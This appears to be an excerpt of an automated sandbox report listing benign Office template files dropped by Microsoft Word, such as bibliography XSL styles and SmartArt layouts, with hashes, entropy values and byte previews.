                              Encrypted:false
                              SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                              MD5:4A9A2E8DB82C90608C96008A5B6160EF
                              SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                              SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                              SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):296658
                              Entropy (8bit):5.000002997029767
                              Encrypted:false
                              SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                              MD5:9AC6DE7B629A4A802A41F93DB2C49747
                              SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                              SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                              SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):238
                              Entropy (8bit):3.472155835869843
                              Encrypted:false
                              SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                              MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                              SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                              SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                              SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):5151
                              Entropy (8bit):7.859615916913808
                              Encrypted:false
                              SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                              MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                              SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                              SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                              SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                              Malicious:false
                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):252
                              Entropy (8bit):3.4680595384446202
                              Encrypted:false
                              SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                              MD5:D79B5DE6D93AC06005761D88783B3EE6
                              SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                              SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                              SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):5783
                              Entropy (8bit):7.88616857639663
                              Encrypted:false
                              SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                              MD5:8109B3C170E6C2C114164B8947F88AA1
                              SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                              SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                              SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                              Malicious:false
                              Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):246
                              Entropy (8bit):3.5039994158393686
                              Encrypted:false
                              SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                              MD5:16711B951E1130126E240A6E4CC2E382
                              SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                              SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                              SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):3683
                              Entropy (8bit):7.772039166640107
                              Encrypted:false
                              SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                              MD5:E8308DA3D46D0BC30857243E1B7D330D
                              SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                              SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                              SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                              Malicious:false
                              Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):292
                              Entropy (8bit):3.5026803317779778
                              Encrypted:false
                              SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                              MD5:A0D51783BFEE86F3AC46A810404B6796
                              SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                              SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                              SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):251032
                              Entropy (8bit):5.102652100491927
                              Encrypted:false
                              SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                              MD5:F425D8C274A8571B625EE66A8CE60287
                              SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                              SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                              SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):254
                              Entropy (8bit):3.4845992218379616
                              Encrypted:false
                              SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                              MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                              SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                              SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                              SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):6024
                              Entropy (8bit):7.886254023824049
                              Encrypted:false
                              SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                              MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                              SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                              SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                              SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                              Malicious:false
                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):332
                              Entropy (8bit):3.547857457374301
                              Encrypted:false
                              SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                              MD5:4EC6724CBBA516CF202A6BD17226D02C
                              SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                              SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                              SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):284415
                              Entropy (8bit):5.00549404077789
                              Encrypted:false
                              SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                              MD5:33A829B4893044E1851725F4DAF20271
                              SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                              SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                              SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):374
                              Entropy (8bit):3.5414485333689694
                              Encrypted:false
                              SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                              MD5:2F7A8FE4E5046175500AFFA228F99576
                              SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                              SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                              SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):47296
                              Entropy (8bit):6.42327948041841
                              Encrypted:false
                              SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                              MD5:5A53F55DD7DA8F10A8C0E711F548B335
                              SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                              SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                              SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                              Malicious:false
                              Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):332
                              Entropy (8bit):3.4871192480632223
                              Encrypted:false
                              SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                              MD5:333BA58FCE326DEA1E4A9DE67475AA95
                              SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                              SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                              SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):254875
                              Entropy (8bit):5.003842588822783
                              Encrypted:false
                              SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                              MD5:377B3E355414466F3E3861BCE1844976
                              SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                              SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                              SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):262
                              Entropy (8bit):3.4901887319218092
                              Encrypted:false
                              SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                              MD5:52BD0762F3DC77334807DDFC60D5F304
                              SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                              SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                              SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                              Malicious:false
